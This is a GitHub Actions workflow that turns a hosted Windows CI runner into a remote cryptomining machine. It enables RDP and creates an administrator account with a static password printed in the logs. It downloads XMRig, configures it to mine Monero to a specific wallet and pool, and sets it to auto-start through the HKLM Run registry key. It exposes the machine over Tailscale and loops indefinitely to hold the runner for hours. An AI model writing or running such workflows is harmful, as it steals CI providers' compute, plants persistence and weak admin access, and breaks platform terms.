name: RDP TEST with Registry Auto-Start Miner

on:
  workflow_dispatch:

jobs:
  secure-rdp:
    runs-on: windows-latest
    timeout-minutes: 3600

    steps:
      - name: Configure Core RDP Settings
        run: |
          Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0 -Force
          netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
      - name: Create RDP User with Static Password
        run: |
          $password = "Runner-12345"
          $securePass = ConvertTo-SecureString $password -AsPlainText -Force
          New-LocalUser -Name "RDP" -Password $securePass -AccountNeverExpires
          Add-LocalGroupMember -Group "Administrators" -Member "RDP"
          Add-LocalGroupMember -Group "Remote Desktop Users" -Member "RDP"
          echo "RDP_PASSWORD=$password" >> $env:GITHUB_ENV
          if (-not (Get-LocalUser -Name "RDP")) { Write-Error "User creation failed"; exit 1 }

      - name: Install and Configure XMRig Miner
        run: |
          $ErrorActionPreference = "Stop"
          $minerVersion = "6.21.2"
          $downloadUrl = "https://github.com/xmrig/xmrig/releases/download/v$($minerVersion)/xmrig-$($minerVersion)-msvc-win64.zip"
          $zipPath = "$env:TEMP\xmrig.zip"
          $desktopPath = "C:\Users\RDP\Desktop"
          
          New-Item -ItemType Directory -Force -Path $desktopPath
          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath
          Expand-Archive -Path $zipPath -DestinationPath $desktopPath -Force
          
          $minerFolder = (Get-ChildItem -Path $desktopPath -Directory | Where-Object { $_.Name -like 'xmrig*' }).FullName
          if (-not $minerFolder) { Write-Error "Could not find extracted XMRig folder!"; exit 1 }
          
          $jsonContent = '{"autosave": true,"cpu": true,"opencl": false,"cuda": false,"pools": [{"algo": "rx/0","url": "pool.supportxmr.com:5555","user": "49UWTwnrxNXi8eMTCqdC5U3eiMHrPZkvvbsYN3WEde4o9RYebixumBCCy5oCdoSKkS2U6t9gXJFzJNkxXC7tJ1Uq4uky5BP","pass": "x"}]}'
          $jsonContent | ConvertFrom-Json | ConvertTo-Json -Depth 100 | Set-Content -Path (Join-Path $minerFolder "config.json")

          # Note: The pause command is removed from the .bat file for seamless auto-start
          $shortcutContent = "@echo off`r`ncd /d ""%~dp0""`r`ncd ""$($minerFolder.Split('\')[-1])""`r`nxmrig.exe"
          Set-Content -Path (Join-Path $desktopPath "Start-Miner.bat") -Value $shortcutContent

      - name: Auto-start Miner via Registry
        run: |
          $ErrorActionPreference = "Stop"
          $runKey = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
          $batPath = "C:\Users\RDP\Desktop\Start-Miner.bat"
          
          Write-Host "Adding miner to the registry for auto-start..."
          Set-ItemProperty -Path $runKey -Name "XMRigMiner" -Value $batPath -Force
          
          Write-Host "--- Verification Step ---"
          Write-Host "Querying registry to confirm auto-start entry:"
          $entry = Get-ItemProperty -Path $runKey -Name "XMRigMiner"
          if ($entry.XMRigMiner -eq $batPath) {
              Write-Host "SUCCESS: Registry entry created correctly."
              Write-Host "Value: $($entry.XMRigMiner)"
          } else {
              Write-Error "FAILURE: Could not verify registry entry."
          }
          Write-Host "-------------------------"

      - name: Install Tailscale
        run: |
          Invoke-WebRequest -Uri "https://pkgs.tailscale.com/stable/tailscale-setup-latest.exe" -OutFile "$env:TEMP\tailscale.exe"
          Start-Process "$env:TEMP\tailscale.exe" -ArgumentList "/quiet" -Wait
      - name: Establish Tailscale Connection
        run: |
          & "$env:ProgramFiles\Tailscale\tailscale.exe" up --authkey=${{ secrets.TAILSCALE_AUTH_KEY }} --hostname=gh-runner-$env:GITHUB_RUN_ID
          
          Start-Sleep -Seconds 10
          $tsIP = & "$env:ProgramFiles\Tailscale\tailscale.exe" ip -4
          
          if (-not $tsIP) { Write-Error "Tailscale IP not assigned. Exiting."; exit 1 }
          echo "TAILSCALE_IP=$tsIP" | Out-File -FilePath $env:GITHUB_ENV -Encoding utf8 -Append
      
      - name: Display RDP Connection Details
        run: |
          Write-Host "================================================================"
          Write-Host "                 RDP ACCESS READY"
          Write-Host "================================================================"
          Write-Host "Tailscale IP Address: ${{ env.TAILSCALE_IP }}"
          Write-Host "Username: RDP"
          Write-Host "Password: ${{ env.RDP_PASSWORD }}"
          Write-Host "----------------------------------------------------------------"
          Write-Host "ACTION: The miner will now start AUTOMATICALLY when you log in."
          Write-Host "A command prompt window with the miner should appear."
          Write-Host "================================================================"
      - name: Maintain Connection
        run: |
          while ($true) {
              Start-Sleep -Seconds 300
          }
